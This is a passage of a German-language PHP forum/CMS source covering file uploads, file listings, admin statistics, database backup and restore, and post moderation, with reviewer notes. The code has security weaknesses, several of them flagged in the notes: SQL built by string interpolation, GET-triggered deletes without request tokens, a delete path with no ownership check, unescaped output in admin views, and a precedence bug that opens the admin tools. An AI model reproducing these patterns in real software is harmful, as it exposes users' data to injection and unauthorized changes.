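$out .= "<h3>Sie haben ihren Datei-Upload Content um ".number_format(($len + $_FILES['file']['size'] - $maxfile),0,',','.')." Bytes überschritten!</h3>";
// Extension check: the lower-cased extension is looked up in $type (filled outside this block; presumably the
// allow-list) and $type is replaced by the matching key. Admins pass without a match; their file is stored with type NULL.
elseif(!($type = array_search(strtolower(preg_replace('/^.*?\.(\w+)$/','$1',$name)),$type)) and !($status/2%2))
$out .= "<h3>Ihr Datei-Upload besitzt einen nicht erlaubten Datei-Type!</h3>";
else {
$data = file_get_contents($_FILES['file']['tmp_name']);
// CRC32 (8 hex digits) plus byte length identify the content for the de-duplication lookup below.
// NOTE(review): CRC32 is not collision resistant, so two different files of equal size and CRC32 would share one
// stored body; a cryptographic digest would be needed if uploaders are not trusted.
$crc = str_pad(dechex(crc32($data)),8,0,STR_PAD_LEFT);
$size = strlen($data);
$len += $size;
// Column => SQL-expression map. Values are spliced into the statement verbatim, so each one must already be
// quoted or escaped. $addr is set outside this block and is quoted here without $sql['es'] — TODO confirm it
// cannot contain a quote. If a body with the same CRC32 and size is already stored (link is null), only a [link]
// to that row is written; otherwise size, hash, type and the base64 body are stored.
$var = array_merge(array(
'[create]' => "datetime('now','localtime')",
'[status]' => (int)$_POST['right'] + (int)$_POST['status'],
'[user]' => $uid,
'[name]' => "'$name'",
'[ip]' => "'$addr'",
'[useragent]' => "nullif('".$sql['es']($_SERVER['HTTP_USER_AGENT'])."','')",
'[info]' => "nullif('".$sql['es'](strtr($_POST['info'],$html))."','')"),
($link = $sql['sq']($conn,"select id from [file] where link is null and hash = '$crc' and abs(size) = $size")) ? array('[link]' => $link) : array(
'[size]' => $size,
'[hash]' => "'$crc'",
'[type]' => (($type) ? "nullif('".preg_replace('![^\w/ ;=+-]!','',$_FILES['file']['type'])."','')" : "null"),
'[data]' => "'".base64_encode($data)."'"));
// Keep the deflated body only when it is smaller; a negative [size] marks a compressed body.
if(isset($var['[data]']) and $data = $gz['deflate']($data,9) and strlen($data) < $size) {
$var['[data]'] = "'".base64_encode($data)."'";
$var['[size]'] *= -1;
}
// A live file of this user whose name matches (SQL LIKE) is overwritten in place; otherwise a new row is inserted.
if($val = $sql['sq']($conn,"select id from [file] where status is not null and user = $uid and name like ".$var['[name]']." limit 1")) {
// $sql['e']($conn,"update [file] set status = null where id = $val");
$key = array();
foreach($var as $k => $v)
$key[] = "$k = $v";
if(!@$sql['e']($conn,"update [file] set\n\t".implode(",\n\t",$key)."\nwhere id = $val"))
$var = false;
}
elseif(!@$sql['e']($conn,"insert into [file] (".implode(',',array_keys($var)).") values (".implode(',',array_values($var)).")"))
$var = false;
if(!$var)
$out .= "<h3>Datei konnte nicht verarbeitet werden!</h3>";
}
}
// 2) Edit the metadata of an existing file. Only the first digit run of $_POST['id'] is used as the row id.
// Non-admins are limited to their own rows by "and user = $uid"; only admins may set the content type.
elseif(isset($_POST['send']) and isset($_POST['id']) and preg_match('/\d+/',$_POST['id'],$var)) {
$sql['e']($conn,"
update [file] set
status = ".((int)$_POST['right'] + (int)$_POST['status']).",
name = '".preg_replace('/[^\w!&,.-]/','',$_POST['name'])."',
info = '".$sql['es']($_POST['info'])."'"
.(($status/2%2 and isset($_POST['type'])) ? ",\n\t\ttype = ".((preg_match('![\w/ ;=+-]+!',$_POST['type'],$val)) ? "'$val[0]'" : "null") : "")."
where status is not null and id = $var[0]".(($status/2%2) ? "" : " and user = $uid "));
// Optional charset change for text/* files: the charset parameter is rewritten on the row that holds the body
// (the link target if the file is a link).
if(isset($_POST['charset']) and preg_match('/^[\w-]+$/',$_POST['charset'],$val) and $var = $sql['aq']($conn,"
select ifnull(b.id,a.id) as id,
ifnull(b.type,a.type) as type
from [file] as a
left join [file] as b on a.link = b.id
where a.status is not null and ifnull(a.type,b.type) like 'text/%'".(($status/2%2) ? "" : " and a.user = $uid")." and a.id = $var[0]"))
$sql['e']($conn,"
update [file] set
type = '".preg_replace('!^([\w/-]+).*$!','$1',$var[0]['type'])."; charset=$val[0]'
where id = ".$var[0]['id']);
}
// 3) Delete, triggered by a GET parameter. A row whose status is still set is soft-deleted (status = null), and
// that statement is limited to the owner or an admin.
// NOTE(review): this is a state change on GET and no request token is visible here — confirm whether one is checked elsewhere.
elseif(isset($_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var))
if($sql['sq']($conn,"select 1+status from [file] where id = $var[0]"))
$sql['e']($conn,"update [file] set status = null where (user = $uid or $status/2%2) and id = $var[0]");
else
// Permanent delete of an already soft-deleted row: the stored body is first handed over to one of the rows
// linking to it, the remaining links are re-pointed, then the row is removed.
// NOTE(review): this branch runs whenever the lookup above returns nothing truthy, and its statements carry no
// "user = $uid" or admin predicate, so the id alone selects the row — confirm whether that is intended.
$sql['e']($conn,strtr("begin;
update [file] set
size = (select size from [file] where id = #),
hash = (select hash from [file] where id = #),
type = (select type from [file] where id = #),
data = (select data from [file] where id = #)
where id = (select id from [file] where link = # limit 1);
update [file] set link = (select id from [file] where link = # and data is not null)
where link = #;
update [file] set link = null where id = link;
delete from [file] where id = #;
commit;",array('#' => $var[0])));
// 4) Restore a soft-deleted file (admins only): status is set back to 1.
elseif($status/2%2 and isset($_GET['restore']) and preg_match('/\d+/',$_GET['restore'],$var))
$sql['e']($conn,"
update [file]
set status = 1
where id = $var[0]");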
// File overview table. $data becomes the WHERE clause: admins ($status/2%2) with a non-boolean $mid see all files
// ($mid < 0) or those of user $mid; everybody else sees only their own files that are not soft-deleted.
// NOTE(review): $mid is interpolated into SQL and into links below; it is set outside this block — confirm it is numeric.
$data = (($status/2%2 and !is_bool($mid)) ? (($mid < 0) ? '' : "where a.user = $mid") : "where a.user = $uid and a.status is not null");
$num = $sql['sq']($conn,"select count(*) from [file] as a $data");
if($page[0] == '')
$page = array(1,"page=1");
// The return value of this call is discarded. $val (used as the LIMIT offset) and $code (printed under the table)
// are not assigned anywhere in the visible listing code; presumably the $paging pattern/replacement pair sets
// them as a side effect — TODO confirm against the definition of $paging.
preg_replace($paging[5],$paging[6],"$num,$max,<a href='$self/Datei?page=#key##max#&user=$mid".(($sort) ? "&sort=$sort" : "")."' title='#var#'>#key#</a>");
// One row per file; for linked files (a.link) size, hash and type are taken from the row that holds the body.
if($rows = $sql['aq']($conn,"
select a.name as name,
abs(ifnull(a.size,b.size)) as absize,
a.user||'-'||a.name as flink,
a.id as id,
u.username as uname,
a.ip as ip,
ifnull(a.status/2%2,1) as status,
a.status%2 as right,
a.[create],
ifnull(a.hash,b.hash) as hash,
a.info as info,
ifnull(a.type,b.type) as type,
a.useragent as agent,
a.link as link,
a.user as user,
ifnull(a.size,b.size) as size,
ifnull(length(a.data),0) as truesize,
strftime('%d.%m.%Y %H:%M:%S',a.[create]) as erstellt
from [file] as a
left join [file] as b on a.link = b.id
left join [user] as u on a.user = u.id
$data".preg_replace($sorth[2],$sorth[3],'u.id,a.name;11;a.name')."
limit $val,$max",SQLITE_ASSOC)) {
$row = array(); // user
// Extra query-string part that keeps an admin inside the selected user's listing.
$val = ($status/2%2 and $mid) ? "&user=$mid" : false;
// Running total of the listed sizes; read later for the "insgesamt belegt" figure of the upload form.
$key = 0;
foreach($rows as $var)
// Builds one table row. The ID-link, user and IP columns are only emitted for admins.
// NOTE(review): $var[agent] (the uploader's User-Agent, stored with SQL escaping only) and $var[uname] are placed
// into the markup without the $html translation that is applied to $var['info'] — confirm they are escaped at
// write time, since this row is rendered in an admin's session.
$row[] = "<tr><td><a href='$self/$request?id=$var[id]$val' title='Bearbeiten'>$var[name]</a></td><td align='right' title='".number_format($var['truesize'],0,',','.')." Bytes'>".number_format((($key += $a = abs($var['size'])) ? $a : 0),0,',','.')."</td>"
."<td><code><a href='$self/file?$var[flink]'>::f/$var[flink]</a></code></td>"
.(($status/2%2) ? "<td title='$var[type]'><code><a href='$self/file?$var[id]'>::f/$var[id]</a>".(($var['link']) ? "#$var[link]" : "")."</code></td><td>".(($var['uname']) ? "<a href='$self/Profil?id=".preg_replace('/-.*$/','',$var['flink'])."'>$var[uname]</a>" : "Unbekannt")."</td><td title='$var[agent]'>$var[ip]</td>" : "")
."<td align='center'>".(($var['status']) ? "Privat" : "<a href='$self?s=d&id=$var[user]&q=".urlencode($var['name'])."'>Öffendlich</a>")."</td><td align='center'>".(($var['right']) ? "Jeder" : ((is_null($var['right'])) ? "<a href='$self/$request?restore=$var[id]$val' title='Wiederherstellen'><font color='#ff0000'><b>Gesperrt</b></font></a>" : "Benutzer"))."</td>"
."<td>$var[erstellt]</td><td title='CRC32' align='center'>".(($var['hash']) ? $var['hash'] : "-/-")."</td><td>"
.@preg_replace(array_keys($creole),array_values($creole),strtr($var['info'],array_slice($html,1)))
." </td><td><a href='$self/$request?kill=$var[id]$val".(($sort) ? "&sort=$sort" : "")."' title='Löschen' onclick='return confirm(\"Wirklich Löschen?\")'><b><font color='#ff0000'>X</font></b></a>";
// Table frame: sortable header cells come from $sorth; for an admin viewing one user the sort links keep "user=$mid".
$out .= "<fieldset><legend><b>Übersicht ".(($status/2%2) ? (($mid and $mid < 0) ? "aller" : "<a href='$self/Datei?user=-1'>aller</a>") : "Ihrer")." hochgeladenen Dateien</b></legend><table border='1'><tr>".((($var = preg_replace($sorth[0],$sorth[1],"Datei=1\tGröße=2\tDatei-Link=3\t(ID-Link=4)\t(Benutzer=5)\t(IP-Adresse=6)\tStatus=7\tRechte=8\tErstellt=9\tHash=10\tBeschreibung=11")) and $status/2%2 and $mid) ? preg_replace('/(?=sort=)/',"user=$mid&",$var) : $var)."<th> </th></tr>".implode("",$row)."</table><h4 align='center'>$code</h4></fieldset>";
}
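// Upload / edit form. When $id is set, the form is pre-filled from that file row (type taken from the link target
// for linked files); otherwise empty defaults are used.
// NOTE(review): the lookup selects by id only, without a "user = $uid" predicate, and $id is set outside this
// block — confirm that a non-owner cannot read another file's name/info/type through this pre-fill.
$row = ($id and $row = $sql['aq']($conn,"
select a.status as status,
a.name as name,
a.info as info,
ifnull(a.type,b.type) as type
from [file] as a
left join [file] as b on a.link = b.id
where a.id = $id")) ? reset($row) : array('name' => '', 'info' => '', 'status' => 1, 'type' => '');
// Legend figure: admins see the bytes in use (the listing total when $mid == -1, else $len), users see the free quota.
$val = ($status/2%2) ? (($mid == -1) ? array($key,'insgesamt belegt') : array($len,'belegt')) : array($maxfile-$len,'frei');
// Admins get a free-text Content-Type field; other users only get a charset field, and only for text/* files.
// Fix: the "utf-8" shortcut of the admin Content-Type field wrote "charset=urf-8" into the field; it now writes "charset=utf-8".
// $row[name] and $row[type] are emitted without HTML escaping; both are reduced to a small character set by the
// visible upload and edit code before they are stored.
$out .= "<form name='file' action='$self".(($status/2%2 and $mid) ? "?user=$mid" : "")."' method='post' enctype='multipart/form-data'><table cellspacing='0' cellpadding='0'><tr><td><fieldset><legend><b>Datei-Upload <small>(".number_format(($val[0]),0,',','.')." Bytes $val[1])</small></b></legend>
<table width='100%'><tr><td width='1%'><small>Datei</small><br /><input type='file' name='file' /></td>
<td><small>Dateiname</small><br /><input type='text' name='name' value='$row[name]' style='width:100%' /></td></tr></table>
<table width='100%'><tr><td><small>Beschreibung</small><br /><input type='text' name='info' value='".strtr($row['info'],array_slice($html,1))."' style='width:100%' /></td>
<td><small>Status</small><br /><select name='status' size='1'><option value='0'>Öffendlich</option><option value='2'".(($row['status']/2%2) ? " selected" : "").">Privat</option></select>
<td><small>Rechte</small><br /><select name='right' size='1'><option value='1'>Jeder</option><option value='0'".(($row['status']%2) ? "" : " selected").">Benutzer</option></select>"
.(($status/2%2 and ($row['type'] or is_null($row['type']))) ? "</td><td><small>Content-Type:"
.((preg_match('!^text/!',$row['type'])) ? " (<span onclick='document.file.type.value=document.file.type.value.replace(/^(text\/[\w-]+).*$/,\"$1; charset=iso-8859-1\")'>iso</span> / <span onclick='document.file.type.value=document.file.type.value.replace(/^(text\/[\w-]+).*$/,\"$1; charset=utf-8\")'>utf-8</span>)": '')."</small><br /><input type='text' name='type' value='$row[type]' />"
: ((preg_match('!^text/([\w-]+)(?:;\s*charset\s*=\s*([\w-]+))?$!',$row['type'],$var)) ? "</td><td><small>Charset (<span onclick='document.file.charset.value=\"iso-8859-1\"'>iso</span> / <span onclick='document.file.charset.value=\"utf-8\"'>utf-8</span>)</small><br /><input type='text' name='charset' value='".((isset($var[2])) ? $var[2] : '')."' />" : ""))."</td><td valign='bottom'>
<input type='submit' name='send' value='Hochladen' /></td></tr></table>
<input type='hidden' name='request' value='$request' /><input type='hidden' name='id' value='$id' /><input type='hidden' name='MAX_FILE_SIZE' value='$maxfile' />
</fieldset></td></tr></table></form>";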
}
# Administrator Werkzeuge
if($uid and $status/2%2 or $info[3] != '') {
// Admin tool menu (Creole markup) and, for the Status page, the statistics tables.
// NOTE(review): the enclosing condition is "$uid and $status/2%2 or $info[3] != ''". "and" binds tighter than "or",
// so a non-empty $info[3] alone admits the request to everything in this section (Status, Backup, Admin).
// $info[3] is set outside the visible code — confirm what can make it non-empty.
$info[4] = "|>-\n|--[ [[^Backup]] ~| [[^CMS]] ~| [[^SQL|SQL-Konsole]] ~| [[^Status]] ]--|\n";
// On the admin tool pages the menu is rendered once into $info[8], which the pages below prepend to their output.
if(preg_match('/^(cms|backup|sql|status)$/i',$request))
$info[8] = @preg_replace(array_keys($creole),array_values($creole),"$info[4]--");
// Status page: one row of global counters (admins, status%2 set/clear, logins, requests, IPs shared by several
// accounts); the page is only rendered when the counters sum to a non-zero value.
if($request == 'Status' and array_sum($var = reset(($sql['aq']($conn,"
select (select count(*) from user where status/2%2),
(select count(*) from user where status%2),
(select count(*) from user where status%2 = 0),
(select sum(logins) from user),
(select sum(requests) from user),
(select count(*) from (select count(*) from [user] group by ip having count(*) > 1))",SQLITE_NUM))))) {
// "Allgemein" box. The admin user names are printed as returned by the query, without HTML escaping here.
$out .= "$info[8]<table align='center'><tr><td colspan='2'><fieldset><legend><b>Allgemein</b></legend>"
."Admins: $var[0] - ".((is_array($val = $sql['sq']($conn,"select Username from user where status/2%2"))) ? implode(", ",$val) : $val)
." / Online: $var[1] / Offline: $var[2] / Logins: ".number_format($var[3],0,',','.')." / Zugriffe: ".number_format($var[4],0,',','.')." / Gleiche IPs: $var[5]</fieldset></td></tr>";
$out .= "<tr><td><fieldset><legend><b>Inhalte</b></legend><table border='1'><tr>"
.preg_replace($sorth[0],$sorth[1],"Art=1\tBenutzer=2\tInsgesamt=3\tÖffendlich=4\tGelöscht=5\tZuerst Erstellt=6\tZuletzt Erstellt=7\tZuletzt Geändert=8")."</tr>";
$row = array();
// One UNION row per content area: label, users, total, public, deleted, first/last created, last changed.
// The ORDER BY part is produced by the $sorth replacement.
foreach($sql['aq']($conn,"
select 'Mitglieder',
(select count(profil) from user where status is not null),
(select count(*) from user where status is not null),
(select count(page) from user where status is not null),
(select count(*) from user where status is null),
(select min([create]) from user),
(select max([create]) from user),
(select max(change) from user)
union select 'Blog',
(select count(*) from (select count(*) from forum where status is not null and mailid = userid and mailid is not null group by userid)),
(select count(*) from forum where status is not null and mailid = userid and mailid is not null),
(select count(*) from forum where status%2=0 and mailid = userid and mailid is not null),
(select count(*) from forum where status is null and mailid = userid and mailid is not null),
(select min([create]) from forum where mailid is not null and userid = mailid),
(select max([create]) from forum where mailid is not null and userid = mailid),
(select max([change]) from forum where mailid is not null and userid = mailid)
union select 'Chat',
(select count(user) from chat),
(select count(*) from chat),
(select count(*) from (select distinct u.id from user as c left join user as u on c.chat = u.id where u.id is not null and u.status/4%2 group by u.id)),
null,
(select min(time) from chat),
(select max(time) from chat),
null
union select 'CMS',
(select count(*) from user where status/2%2),
(select count(*) from cms),
(select count(*) from cms where status/8%2),
null,
(select min([create]) from cms),
(select max([create]) from cms),
(select max([change]) from cms)
union select 'Datei',
(select count(*) from (select count(*) from file where status is not null group by user)),
(select count(*) from file where status is not null),
(select count(*) from file where status%2=0),
(select count(*) from file where status is null),
(select min([create]) from file),
(select max([create]) from file),
null
union select 'Mail',
(select count(*) from (select count(*) from forum where status is not null and mailid != userid and mailid is not null group by userid)),
(select count(*) from forum where status is not null and mailid is not null and mailid != userid),
null,
(select count(*) from forum where status is null and mailid is not null and mailid != userid),
(select min([create]) from forum where mailid is not null and userid != mailid),
(select max([create]) from forum where mailid is not null and userid != mailid),
(select max([change]) from forum where mailid is not null and userid != mailid)
union select 'Forum',
(select count(*) from (select count(*) from forum where status is not null and mailid is null group by userid)),
(select count(*) from forum where status is not null and mailid is null),
(select count(*) from forum where status%2=0 and mailid is null),
(select count(*) from forum where status is null and mailid is null),
(select min([create]) from forum where mailid is null),
(select max([create]) from forum where mailid is null),
(select max([change]) from forum where mailid is null)".preg_replace($sorth[2],$sorth[3],"1;8"),SQLITE_NUM) as $line)
// Areas with a zero total are skipped.
if($line[2]) {
$out .= "<tr>";
// Column 0 is the area label, linked to its page; digit-only or NULL cells are centred (NULL shown as "-/-");
// timestamps are reformatted from Y-m-d H:i:s to d.m.Y H:i.
foreach($line as $key => $var)
$out .= "<td".(($key) ? ((preg_match('/^\d*$/',$var)) ? " align='center'>".((is_null($var)) ? "-/-" : $var)
: ">".preg_replace('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/','$3.$2.$1 $4:$5',$var)) : "><a href='$self/$var'><b>$var</b></a>")."</td>";
$out .= "</tr>";
}
$out .= "</table></fieldset></td></tr></table>";
}
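// Database backup page: vacuum, create/restore the local "$base.gz" snapshot, download the database (binary or
// SQL dump), download set-aside copies of damaged databases, or restore from an uploaded file.
// Changes against the previous version: the download responses now send a valid "Content-Disposition: attachment; ..."
// header (the disposition type was missing) and the binary download uses "application/octet-stream"
// (was "application/octetstream"), so the content is saved as a file.
// NOTE(review): none of the forms below carries a request token and "reset"/"create"/upload change server state —
// confirm whether cross-site requests are rejected elsewhere.
if($request == 'Backup') { // Backup Database
// Restore source: a successfully uploaded file if present, otherwise the local snapshot.
$var = (isset($_FILES['sqlite']['tmp_name']) and !$_FILES['sqlite']['error'] and file_exists($_FILES['sqlite']['tmp_name'])) ? $_FILES['sqlite']['tmp_name'] : "$base.gz";
if($query == 'reorg')
$sql['e']($conn,"vacuum");
// Create the snapshot: only when none exists yet or overwriting is allowed ($owbu); copied in 1 KiB chunks.
elseif(isset($_POST['create']) and (!file_exists("$base.gz") or $owbu) and ($fr=fopen($base,'rb')) and ($fw=$gz['open']("$base.gz",'wb9'))) {
while(!feof($fr))
$gz['write']($fw,fread($fr,1024));
fclose($fr);
$gz['close']($fw);
}
// Restore: the live database file is overwritten with the unpacked source, then the browser is redirected.
// NOTE(review): the connection is closed before it is known that the source can be opened, and the source is
// not checked to be a database of this application before $base is overwritten.
if($var != "$base.gz" or isset($_POST['reset'])) { // Restore
$sql['cl']($conn);
if(($fr=$gz['open']($var,'rb')) and ($fw=fopen($base,'wb'))) {
while(!$gz['eof']($fr))
fwrite($fw,$gz['read']($fr,1024));
$gz['close']($fr);
fclose($fw);
@touch($base,filemtime($var));
header("Location: $self");
die("Weiter zum <a href='$self'>Forum</a>");
}
}
// Download of a set-aside database copy. basename() strips any directory part from the request parameter and
// the extension of $base is appended, so only files with that extension in one directory can be named.
// NOTE(review): the directory is derived by cutting $base at its first "/" — verify against how $base is built.
elseif(isset($_GET['download']) and file_exists($var = preg_replace('/\/.*$/','',$base)."/".basename($_GET['download']).strrchr($base,'.')) and is_file($var)) { // Save Fail-DB
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($var).'"');
header('Content-Length: '.filesize($var));
readfile($var);
exit();
}
// Download of the database: the existing snapshot when requested via the query string and present, otherwise
// the live file gzip-encoded on the fly.
elseif(isset($_POST['backup']) or $query == 'download') { // Save DB
$var = ($query and file_exists("$base.gz")) ? file_get_contents("$base.gz") : $gz['encode'](file_get_contents($base),9);
header('Content-Type: application/x-gzip');
header('Content-Disposition: attachment; filename="'.basename($base).'.gz"');
header('Content-Length: '.strlen($var));
die($var);
}
// SQL dump of every non-internal table, wrapped in one transaction. "dt" adds a drop/delete per table, "ct"
// emits the CREATE statement (otherwise it is written as a comment).
elseif(isset($_REQUEST['sqldump']) and $tables = $sql['q']($conn,"select name,sql from sqlite_master where type='table' and name not like 'sqlite_%'")) { // Make SQL-Dump
$eol = "\r\n";
$val = "begin;$eol";
while($table = $sql['fa']($tables,SQLITE_ASSOC)) {
$val .= ((isset($_REQUEST['dt'])) ? ((isset($_REQUEST['ct'])) ? "drop table" : "delete from")." [$table[name]];$eol" : "")
.((isset($_REQUEST['ct'])) ? "$table[sql];" : "/* ".$table['sql']." */").$eol;
if($lines = $sql['q']($conn,"select * from [$table[name]]")) {
$cols = $sql['nf']($lines);
$name = array();
for($a=0; $a<$cols; $a++)
$name[] = "[".$sql['fn']($lines,$a)."]";
while($line = $sql['fa']($lines,SQLITE_NUM)) {
// NULL stays null, plain decimal numbers are written bare, everything else is escaped and quoted.
foreach($line as $key => $var)
$line[$key] = (is_null($var)) ? 'null' : ((preg_match('/^(0|-?[1-9]\d*(\.\d+)?)$/',$var)) ? $var : "'".$sql['es']($var)."'");
$val .= "insert into [$table[name]] (".implode(",",$name).") values (".implode(",",$line).");$eol";
}
}
}
$val = $gz['encode']($val."commit;$eol",9);
header('Content-Type: application/x-gzip');
header('Content-Disposition: attachment; filename="'.preg_replace('/(?<=\.)\w+$/','sql',basename($base)).'.gz"');
header('Content-Length: '.strlen($val));
die($val);
}
// No action requested: render the backup page (download, dump, snapshot restore/create, list of set-aside
// databases found by glob, upload-and-restore form).
else
$out .= "$info[8]<table align='center'><tr><td><fieldset><legend><b>Datenbank Backup</b></legend>
<table align='right'><tr><td><small><a href='$self/SQL' title='SQL-Konsole'>".basename($base)."</a><br /><a href='$self/Backup?reorg' title='Datenbank reorganisieren'>".number_format(filesize($base),0, '.', ',')." Bytes</a></small></td></tr></table>
<form name='save' action='$self/Backup' method='post'><small>SQLite-Binary:</small><br /><input type='submit' name='backup' value='Herunterladen' /><br clear='all' /><br />
<table width='100%'><tr><td><small>SQL-Dump:</small><br /><input type='submit' name='sqldump' value='Erstellen' /></td><td>
<input type='checkbox' id='ct' name='ct' value='1' checked /><label for='ct'><small>Tabellen neu erstellen</small></label><br />
<input type='checkbox' id='dt' name='dt' value='1' /><label for='dt'><small>Alte Tabellen löschen/leeren</small></label></td></tr></table></form>"
.((file_exists("$base.gz")) ? "<hr /><table align='right'><tr><td align='right'><small><a href='$self/Backup?download'>".basename($base).".gz</a><br />vom: ".date("d.m.Y H:i:s",filemtime("$base.gz"))."</small></td></tr></table>
<form name='reset' action='$self/Backup' method='post'><small>Letzte Sicherung:</small><br /><input type='submit' name='reset' value='Zurückspielen' /></form>" : "")
.((!file_exists("$base.gz") or $owbu) ? "<form name='create' action='$self/Backup' method='post'><table width='100%'><tr><td><small>Sicherung:</small></td><td align='right'><input type='submit' name='create' value='Erstellen' /></tr></table></form>" : "")
.(($val = glob(preg_replace('/(?=\.\w+$)/','_*',$base))) ? "<hr /><small>Defekte Datenbanken:<br />".implode("<br />",preg_replace('/^((.*?)_(\d\d)(\d\d)(\d\d)(\d\d)(\d\d)(\d\d))(\.\w+)$/',"<a href='$self/Backup?download=$1'>$2$9</a> vom: $5.$4.$3 $6:$7:$8",$val))."</small>" : '')
."<hr /><form enctype='multipart/form-data' name='load' action='$self/Backup' method='post'><small>Hochladen & Zurückspielen:</small><br />
<input type='hidden' name='MAX_FILE_SIZE' value='".(preg_replace('/\D/','',ini_get('upload_max_filesize'))*1024*1024)."' />
<input type='file' name='sqlite' size='24' /><br /><input type='submit' value='Hochladen' /></form></fieldset></td></tr></table>";
}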
# Administration von Forenbeiträgen
// Moderation of a single forum post: delete, lock, unlock, or edit. Every id is taken as the first digit run of
// the request parameter, so only digits reach the SQL text.
// NOTE(review): delete/lock/unlock are triggered by GET parameters (the links are built further down) and no
// request token is visible — confirm whether cross-site requests are rejected elsewhere.
if($request == 'Admin') {
if(isset($_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var))
$sql['e']($conn,"delete from [forum] where id=$var[0]");
elseif(isset($_GET['lock']) and preg_match('/\d+/',$_GET['lock'],$var))
$sql['e']($conn,"update [forum] set status=null where status is not null and id=$var[0]");
elseif(isset($_GET['save']) and preg_match('/\d+/',$_GET['save'],$var))
$sql['e']($conn,"update [forum] set status=0 where status is null and id=$var[0]");
if(isset($_GET['edit']) and preg_match('/\d+/',$_GET['edit'],$var)) {
// Save: title and message go through the $html translation and $sql['es']; the numeric fields are reduced to
// digits (path to digits and "/").
// NOTE(review): userid is spliced in without quotes or nullif(), so an empty or missing $_POST['userid'] yields
// "userid=," and the statement fails; status, userid, mailid and path are read without isset().
if(isset($_POST['edit']) and isset($_POST['message']) and $_POST['message'] != '') {
$sql['e']($conn,"
update [forum] set change=datetime('now','localtime'),
changes=changes+1,
title=nullif('".((isset($_POST['title'])) ? $sql['es'](strtr($_POST['title'],$html)) :'')."',''),
message='".$sql['es'](strtr($_POST['message'],$html))."',
status=nullif('".preg_replace('/\D/','',$_POST['status'])."',''),
userid=".preg_replace('/\D/','',$_POST['userid']).",
mailid=nullif('".preg_replace('/\D/','',$_POST['mailid'])."',''),
path=nullif('".preg_replace('/[^\d\/]/','',$_POST['path'])."','')
where id=$var[0]");
// After saving, continue on the page the post belongs to: Blog (mailid == userid), Mail, or the forum ('').
$request = ($mid or $_POST['mailid']) ? (($_POST['mailid'] == $_POST['userid']) ? 'Blog' : 'Mail') : '';
if(!$q)
$q = $var[0];
}
else {
// Base URL for the action links, carrying over $getopt and the current page parameter.
$wrt = array();
if($getopt != '')
$wrt[] = $getopt;
if($page[1] != '')
$wrt[] = $page[1];
$wrt = "$self/Admin?".implode('&',$wrt).((count($wrt) > 0) ? '&' : '');
// Load the post together with its author's user name.
$line = reset(($sql['aq']( $conn,"
select f.id as id,
strftime('%s',f.[create]) as 'create',
strftime('%s',f.change) as change,
strftime('%d.%m.%Y %H:%M:%S',f.[create]) as crdatum,
strftime('%d.%m.%Y %H:%M:%S',f.change) as chdatum,
f.changes as changes,
f.userid as userid,
f.mailid as mailid,
f.ip as uip,
f.useragent as ua,
f.status as status,
ifnull(f.status%2,'-1') as right,
f.path as path,
f.title as title,
f.message as message,
u.username as author
from [forum] as f
left join [user] as u on u.id = f.userid
where f.id=$var[0]",SQLITE_ASSOC)));
// Preview: posted field values replace the stored ones, so the form below shows unsaved input.
// These values come straight from $_POST; userid/mailid are later placed into href attributes as they are.
foreach($_POST as $k => $v)
if(preg_match('/^(title|message|userid|mailid|path|status)$/',$k))
$line[$k] = $v;
$creolevar = array_merge($creolevar,array('type' => 'forum', 'id' => $line['id'], 'name' => $line['id'], 'title' => $line['title'], 'from' => $line['author'], 'create' => $line['create'], 'change' => $line['change'], 'right' => $line['right']));
// Option lists for sender and recipient; the matching user names are remembered as $line['from'] / $line['to'].
// NOTE(review): $v[username] is emitted without escaping here — confirm it is HTML-safe when stored.
$array = array();
foreach($sql['aq']($conn,"select id,username from user") as $v) {
$array['user'][] = "<option value='$v[id]'".(($line['userid'] == $v['id']) ? " selected" : "").">$v[username]</option>";
$array['mail'][] = "<option value='$v[id]'".(($line['mailid'] == $v['id']) ? " selected" : "").">$v[username]</option>";
if($v['id'] == $line['userid'])
$line['from'] = $v['username'];
if($v['id'] == $line['mailid'])
$line['to'] = $v['username'];
}
// Edit form: rendered post with its meta data (IP and user agent go through the $html translation), the
// lock/unlock and delete links, then the editable fields.
$out .= "<form action='$wrt"."edit=$var[0]' method='post'><fieldset class='cr'><legend>"
.((is_null($line['title'])) ? "<i>Ohne Titel</i>" : "<b>".preg_replace(array_keys($smile),array_values($smile),preg_replace($phtml[0],$phtml[1],$line['title']))."</b>")." von "
.((!isset($line['from']) or is_null($line['from'])) ? "Unbekannt" : "<a href='$self/Profil?id=$line[userid]'>$line[from]</a>")
.((!isset($line['to']) or is_null($line['to'])) ? "" : " an <a href='$self/Profil?id=$line[mailid]'>$line[to]</a> [<font color='#".((floor($line['status']/2)) ? "00a000'>" : "a00000'>un")."gelesen</font>]")
." <b><a href='#edit'>Bearbeiten</a></b> <small>(<a href='$self/Source?q=$var[0]'>Quelltext</a>)</small></legend><small>Metainformationen:</small><br />
Erstellt: $line[crdatum] / Zuletzt geändert: $line[chdatum] / Änderungen: $line[changes]<br>
IP: ".strtr($line['uip'],$html)." / Useragent: ".strtr($line['ua'],$html)." / Status: ".((is_null($line['status'])) ? "<font color='#ff0000'>Gesperrt</font> <small>(<a href='$wrt"."save=$var[0]'>Entsperren"
: "Normal <small>(<a href='$wrt"."lock=$var[0]'>Sperren")."</a> | <a href='$wrt"."kill=$var[0]'>Löschen</a>)</small>"
.((is_null($line['path'])) ? "" : " / <a href='$self".(($mid) ? "/Mail?user=$mid&" : "?")."q=".preg_replace('!^.*/(\d+)/$!','$1',$line['path'])."'>Reference suchen</a>")."<hr />"
.@preg_replace(array_keys($creole),array_values($creole),strtr($line['message'],array_slice($html,1)))."<br clear='all' /><hr /><a name='edit' /><table width='100%'><tr>
<td width='99%'><small>Titel:</small><br /><input type='text' name='title' value='".preg_replace($phtml[0],$phtml[1],$line['title'])."' style='width:100%' /></td>
<td><small>Von:</small><br /><select name='userid' size='1'><option value='0'>Unbekannt</option>".implode('',$array['user'])."</select></td>
<td><small>An:</small><br /><select name='mailid' size='1'><option value=''>Forum</option>".implode('',$array['mail'])."</select></td>
<td><small>Status:</small><br /><input type='text' size='1' name='status' value='".preg_replace('/\D/','',$line['status'])."' /></td>
<td><small>Path:</small><br /><input type='text' size='10' name='path' value='".preg_replace('/[^\d\/]/','',$line['path'])."' /></td></tr>
